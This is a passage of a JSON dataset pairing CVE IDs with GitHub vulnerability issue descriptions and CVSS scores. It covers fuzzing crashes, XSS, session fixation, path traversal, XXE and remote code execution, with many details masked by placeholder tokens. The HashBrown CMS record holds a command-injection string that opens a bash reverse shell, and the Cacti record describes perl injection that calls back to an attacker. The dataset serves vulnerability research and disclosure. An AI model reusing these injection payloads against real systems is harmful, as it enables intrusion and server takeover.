        "description": "XSS vulnerability: CVS lastlog filename not escaped. Describe the bug When the APITAG option is enabled, APITAG shows for directories in the directory view the log message of the most recently modified child thereof, along with the child file's name and revision number. Unfortunately, the child file's name is not properly HTML escaped. Steps to reproduce the behavior NUMBERTAG In a CVS repository, copy the APITAG backing file for any non dead versioned file into an otherwise empty subdirectory of the repository. ERRORTAG NUMBERTAG Ensure that APITAG is enabled in your APITAG file (restarting any relevant servers NUMBERTAG In APITAG visit the parent directory of the newly created file. APITAG will pass the name of your newly created file (minus the APITAG bit) to the browser without escaping that name for safe HTML transport. In this specific example, a APITAG alert dialog will appear with the message NUMBERTAG Expected behavior APITAG should relay the name of the last modified file, properly escaped.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.5,
        "impactScore": 2.5,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-5290",
        "Issue_Url_old": "https://github.com/redpwn/rctf/issues/147",
        "Issue_Url_new": "https://github.com/redpwn/rctf/issues/147",
        "Repo_new": "redpwn/rctf",
        "Issue_Created_At": "2020-03-29T07:04:38Z",
        "description": "Session fixation vulnerability in /verify. Description There is a session fixation vulnerability in rCTF exploitable through the APITAG hash when making a request to the APITAG endpoint. Vulnerable code ERRORTAG Exploitation Scenario An attacker team could potentially steal flags by, for example, exploiting a stored XSS payload in a CTF challenge so that victim teams who solve the challenge are unknowingly (and against their will) signed into the attacker team's account. Then, the attacker can gain points / value off the backs of the victims. Reproduction Steps NUMBERTAG Create two teams: an attacker, and a victim. Sign into the victim's account NUMBERTAG Make an HTTP request to APITAG where APITAG is the attacker's team code NUMBERTAG Observe that you have been logged in as the attacker. Extra Details Commit that introduced the vulnerability URLTAG Potential solutions Instead of having the verification email link immediately sign users in, have it be purely for confirmation purposes. After opening the verification link and verifying the email address, the original registration page which is polling the server for updates would receive word that the email is verified. It would then log in without requiring a session ID from user input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5303",
        "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/1696",
        "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/1696",
        "Repo_new": "tendermint/tendermint",
        "Issue_Created_At": "2018-06-06T09:48:53Z",
        "description": "Bounding resource usage in Tendermint. General idea is overall understanding and control of resources used for processing of every kind of message. This is the preliminary thoughts based on discussions with MENTIONTAG RPC: public APIs, submit part. No limit on data length. We need to have limit on request size. We want to constrain number of open connections. Connections can be one shot (http) or persistent (websocket). For persistent connections, we want to limit number of outstanding requests in a period of time. If client submits over broadcast_commit then it is necessary in addition to constrain number of outstanding requests as each request requires creating request context so consumes resources. public APIs, query part. Rate limit number of calls for every endpoint. Bound response size. public APIs, subscribe. Bound number of open subscriptions. Peer connection management: persistent connections to k peers. We bound APITAG We don't accept more connections than this number. There is also a bound on number of outgoing connections. For each connection we want to constrain resources used per message type and put limit on message size. Question: Do we want to have global contract on resource usage, i.e., what part of available bandwidth will be used for Mempool messages, how much for consensus, fast sync, etc. The follow up question is how we can enforce this. Is this static setup or it should be adapted based on node state and the state of its peers. Question: Do we want to have separate connections for sending and receiving of messages? CPU: We want to know number of go routines and correlation with number of peers and number of client connections and subscriptions. Number of go routines should be bounded. Performance analysis of Tendermint should be done. We want to understand number and usage of routines, and what are the bottlenecks. Memory: Memory usage should be bounded and consistent. Profiling of memory usage is needed. Correlation with number of peers and number of client connections and subscriptions should be determined. Disk usage: We want to place constraint on reading/writing to disk.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-5303",
        "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/3338",
        "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/3338",
        "Repo_new": "tendermint/tendermint",
        "Issue_Created_At": "2019-02-20T15:10:34Z",
        "description": "p2p: sent next PEX request too soon. Some users are reporting seeing this error, potentially when talking to seeds. Properly functioning nodes should rate limit how often they send pex requests so they don't send them too frequently. It seems something about this logic is off. An example of this happening was reported in NUMBERTAG though it seems that issue is about a different problem.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-5395",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4084",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4084",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2020-01-03T16:46:57Z",
        "description": "Use after free (heap) in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap use after free in the APITAG function, in sfd.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5496",
        "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/4085",
        "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/4085",
        "Repo_new": "fontforge/fontforge",
        "Issue_Created_At": "2020-01-03T21:15:18Z",
        "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing APITAG with AFL, I found a heap based buffer overflow in the APITAG function, in splinesave.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced in APITAG NUMBERTAG and with latest Git master by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-5497",
        "Issue_Url_old": "https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521",
        "Issue_Url_new": "https://github.com/mitreid-connect/openid-connect-java-spring-server/issues/1521",
        "Repo_new": "mitreid-connect/openid-connect-java-spring-server",
        "Issue_Created_At": "2020-01-03T18:59:15Z",
        "description": "Cross Site Scripting APITAG APITAG appears to be vulnerable to XSS here: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG } ~~~ APITAG is included in the page and is not encoded so malicious elements could be created. If the string APITAG appears in APITAG , the APITAG element will be closed and a new malicious APITAG can be created: ~~~ // get the info of the current user, if available (null otherwise) function APITAG { return APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG APITAG EMAILTAG \",\"email_verified\":true}; } ~~~ FILETAG And the malicious APITAG is executed: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6173",
        "Issue_Url_old": "https://github.com/theupdateframework/tuf/issues/973",
        "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/973",
        "Repo_new": "theupdateframework/python-tuf",
        "Issue_Created_At": "2020-01-08T17:09:34Z",
        "description": "Potential APITAG for attacker that can create metadata files.... We received the report below about an attacker that can create many invalid signatures on a metadata file, delaying the moment when the client will determine the signature is not valid. This delay may be for at least a few minutes, but possibly could be longer especially if multiple files are impacted. Possible remediations include failing earlier (possibly immediately) if any signature is not valid. Credit to Erik Maclean Analog Devices, Inc. for reporting this issue. APITAG Details below.) Tracking ID: CVETAG Summary: Potential Client side Denial of Service Description: While maximum file size is restricted for downloading, the client may attempt to validate a large number of signatures. We have been able to add over NUMBERTAG copies of the same invalid signature into the APITAG file, which results in the client attempting to validate each one, spending several minutes on validation. The file size limit of APITAG is larger and may allow up to NUMBERTAG signatures, further increasing the amount of time spent in validation. Security Impact: Denial of Service Affected Version: Identified at commit APITAG suspect all versions. Credit: Erik Maclean Analog Devices, Inc.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6609",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/179",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/179",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-03T03:19:25Z",
        "description": "Sever. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 APITAG NUMBERTAG heap buffer overflow in read_pages_map PATHTAG POC: URLTAG ASAN says: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6617",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/864",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/864",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:18:26Z",
        "description": "assertion failure in stbtt__cff_int in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6618",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/866",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/866",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:24:48Z",
        "description": "heap overflow in stbtt__find_table in stb_truetype.h. heap overflow in line NUMBERTAG APITAG doesn't check any out of bound access, so heap overflow can be triggered here. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6619",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/863",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/863",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:15:45Z",
        "description": "assertion failure in stbtt__buf_seek in stb_truetype.h. assertion failure in APITAG can be triggered by user supplied font file. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6620",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/868",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/868",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:29:19Z",
        "description": "heap overflow in stbtt__buf_get8 in stb_truetype.h . APITAG has heap overflow vulnerability. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6621",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/867",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/867",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:27:04Z",
        "description": "heap overflow in APITAG in stb_truetype.h. APITAG don't have any bound check, so heap overflow can be triggered. APITAG APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6622",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/869",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/869",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:31:13Z",
        "description": "heap overflow in stbtt__buf_peek8 in stb_truetype.h . heap overflow in APITAG . APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6623",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/865",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/865",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2020-01-06T11:20:15Z",
        "description": "assertion failure in stbtt__cff_get_index in stb_truetype.h. assertion failure in stbtt__cff_get_index can be triggered by user supplied file. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6628",
        "Issue_Url_old": "https://github.com/libming/libming/issues/191",
        "Issue_Url_new": "https://github.com/libming/libming/issues/191",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-01-07T01:51:41Z",
        "description": "heap overflow in decompile_SWITCH. export APITAG ./swftopython $poc FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6629",
        "Issue_Url_old": "https://github.com/libming/libming/issues/190",
        "Issue_Url_new": "https://github.com/libming/libming/issues/190",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2020-01-07T00:53:16Z",
        "description": "null pointer reference in APITAG swftophp $poc FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6630",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1377",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1377",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-01-02T00:45:04Z",
        "description": "null pointer reference in gf_isom_get_media_data_size. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-6631",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1378",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1378",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-01-02T00:49:55Z",
        "description": "null pointer reference in gf_m2ts_stream_process_pmt. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-6838",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4926",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4926",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2020-01-10T08:47:38Z",
        "description": "heap use after free in hash_values_at in PATHTAG compile mruby in ubuntu NUMBERTAG bit with ASAN. poc: CODETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6839",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4929",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4929",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2020-01-10T08:51:54Z",
        "description": "stack overflow in mrb_str_len_to_dbl in APITAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6840",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4927",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4927",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2020-01-10T08:49:02Z",
        "description": "heap use after free in hash_slice in PATHTAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6851",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1228",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1228",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2020-01-10T13:00:24Z",
        "description": "Heap buffer overflow in libopenjp2. Hi, I found a heap buffer overflow that affects at least version NUMBERTAG and current master APITAG On a regular build of openjpeg (in my case, the one shipped by Arch Linux), it leads to a crash; when building the project with address sanitizer, I get the following report: ERRORTAG For the report, I built with Clang NUMBERTAG on Debian stable, using APITAG and APITAG , and calling APITAG with APITAG . The crashing input is available here FILETAG ~seba/openjpeg_poc . Since I believe this may be exploitable, I would like to request a CVE. Let me know if I can help with more information. Thank you!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6860",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/96",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/96",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2020-01-10T09:56:42Z",
        "description": "Stack Buffer Overflow in mysofa2json. We found Stack Buffer Overflow in mysofa2json binary and mysofa2json is complied with clang enabling ASAN. Machine Setup APITAG POC : FILETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6948",
        "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/326",
        "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/326",
        "Repo_new": "hashbrowncms/hashbrown-cms",
        "Issue_Created_At": "2020-01-12T08:00:45Z",
        "description": "remote code execution vulnerability. In file PATHTAG await APITAG clone ' + url + ' ' + APITAG + ' '); The url, username, password and other parameters accept value without proper security check. If I set the git url to something like APITAG $(bash c 'bash i >& PATHTAG NUMBERTAG then when click media to trigger gitpull I can get a reverse shell.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-6949",
        "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/327",
        "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/327",
        "Repo_new": "hashbrowncms/hashbrown-cms",
        "Issue_Created_At": "2020-01-12T08:14:48Z",
        "description": "vulnerability that editor user can change admin user's password. editor role user can change admin user's properties including password hash, salt and token. let's say you have NUMBERTAG users in db id name isadmin hash NUMBERTAG admin true aaaaaa NUMBERTAG editor false bbbbbb editor user can use the postuser function to change his password. Attacker can use this function to change the id and other parameters. If editor changed the id to NUMBERTAG post body)which belong to admin, then he can send another postuser request (set to NUMBERTAG in both post body and url) to overwrite admin's properties (since findone by id NUMBERTAG matches first row now) including hash, token and salt, also changed isadmin to false, static APITAG res) { let id = APITAG let properties = APITAG APITAG APITAG .then((user) => { let APITAG = APITAG 'users'); if(user.id == id || APITAG { // If the current user does not have the \"users\" scope, revert any sensitive properties APITAG { APITAG = APITAG APITAG = false; } return APITAG } return APITAG APITAG \"' + APITAG + '\" does not have scope \"user\"')); }) APITAG => { APITAG properties); <<<<<< accept id, and password value",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6950",
        "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
        "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
        "Repo_new": "eclipse-ee4j/mojarra",
        "Issue_Created_At": "2019-05-12T13:33:12Z",
        "description": "Multiple Path Traversal security issues. There are a couple places that allow manipulating resource requests to disclose arbitrary files under application context. These are tested with Mojarra NUMBERTAG and works under default configuration NUMBERTAG Resource contracts APITAG URLTAG . Under a branch condition, contract name is fetched from an http parameter and doesn't go through any filtering. The resource base path is later concatenated from it and can be abused to return unwanted resource like PATHTAG Another place that has the same vulnerable code is APITAG URLTAG NUMBERTAG Locale prefix The patch for URLTAG is incomplete. APITAG after the check URLTAG still contains tainted data and if the application doesn't declare APITAG in a resource bundle, the application still continues to return that tainted input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-6958",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/943",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/943",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-08-27T14:21:52Z",
        "description": "XXE Vulnerability in APITAG of YAJSW affects Ghidra Server. Describe the bug XXE vulnerability in YAJSW\u2019s APITAG affects Ghidra Server. An insecure way to parse XML input was found in APITAG class from Yet Another Java Service Wrapper used by Ghidra (up to latest version). To Reproduce Steps to reproduce the behavior NUMBERTAG Create an XXE payload file and set the extension of the file to \".jnlp NUMBERTAG Go to PATHTAG NUMBERTAG Modify \"WRAPPER_CONF\" value to point to the \".jnlp\" file NUMBERTAG Run APITAG using \"$ sudo APITAG start NUMBERTAG E exploit in the \".jnlp\" file gets executed Expected behavior Extended XML Entities should be disabled. Environment (please complete the following information): OS: Kali Linux, Debian NUMBERTAG kali NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context I understand the vulnerable code is actually part of a separate library, however I considered this of interest and I suggest adding a filter so no \".jnlp\" configuration files are allowed as values for \"WRAPPER_CONF\", at least until YAJSW patches this problem. More APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7041",
        "Issue_Url_old": "https://github.com/adrienverge/openfortivpn/issues/536",
        "Issue_Url_new": "https://github.com/adrienverge/openfortivpn/issues/536",
        "Repo_new": "adrienverge/openfortivpn",
        "Issue_Created_At": "2020-01-14T13:12:17Z",
        "description": "Security Contact. Dear mantainers, As part of my work at APITAG Security Lab, I have identified some security issues in openfortivpn and I would like to know the preferred way of communicating said issues. Best regards.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7054",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/200",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/200",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2020-01-12T17:21:08Z",
        "description": "heap overflow when parsing APITAG in APITAG in PATHTAG When libiec NUMBERTAG parsing type APITAG , it doesn't check variable APITAG . So we can provide a larger number for APITAG , then memory copy from buffer + APITAG NUMBERTAG lead to heap overflow. APITAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7058",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3186",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3186",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-01-14T22:53:20Z",
        "description": "Critical: Remote Code Execution via string/command type Input String. Describe the bug Input validation error in FILETAG leads to Remote Code Execution via Input String APITAG edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using APITAG input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server. To Reproduce Steps to reproduce the behavior NUMBERTAG After logged in, navigate to Data Collection > Data Input Methods > Unix Ping Host NUMBERTAG By default, Input String was specified as: APITAG . Let's append a malicious perl script in front of current script: CODETAG NUMBERTAG By default, Unix Ping Host data input method is being used by Unix Ping Latency Graph template. This means we can create Unix Ping Latency in current device and gain Remote Code Execution Expected behavior By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first. Screenshots If applicable, add screenshots to help explain your problem. Malicious code: URLTAG Create new graph in device: URLTAG Reverse shell connection: URLTAG Desktop (please complete the following information): OS: Kali Linux, Ubuntu Browser : Firefox, Chrome Version: Firefo NUMBERTAG Chrome NUMBERTAG Remediation I would think about two NUMBERTAG solutions NUMBERTAG Using regex to catch all other strings different from expected string NUMBERTAG Hard coding perl script into source code and force the application to take only NUMBERTAG filtered input (hostname). Chi Tran research APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7105",
        "Issue_Url_old": "https://github.com/redis/hiredis/issues/747",
        "Issue_Url_new": "https://github.com/redis/hiredis/issues/747",
        "Repo_new": "redis/hiredis",
        "Issue_Created_At": "2020-01-09T21:34:41Z",
        "description": "Several potential null pointer dereferencing. The following code never aborts when malloc is unsuccessful, causing dereferencing of null pointers. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7106",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3191",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3191",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-01-15T19:15:24Z",
        "description": "Data source. Describe the bug A clear and concise description of what the bug is. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to NUMBERTAG Click on NUMBERTAG Scroll down to NUMBERTAG See error Expected behavior A clear and concise description of what you expected to happen. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context Add any other context about the problem here.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7218",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7002",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7002",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2020-01-28T19:12:17Z",
        "description": "Reserved Issue Number. TBD",
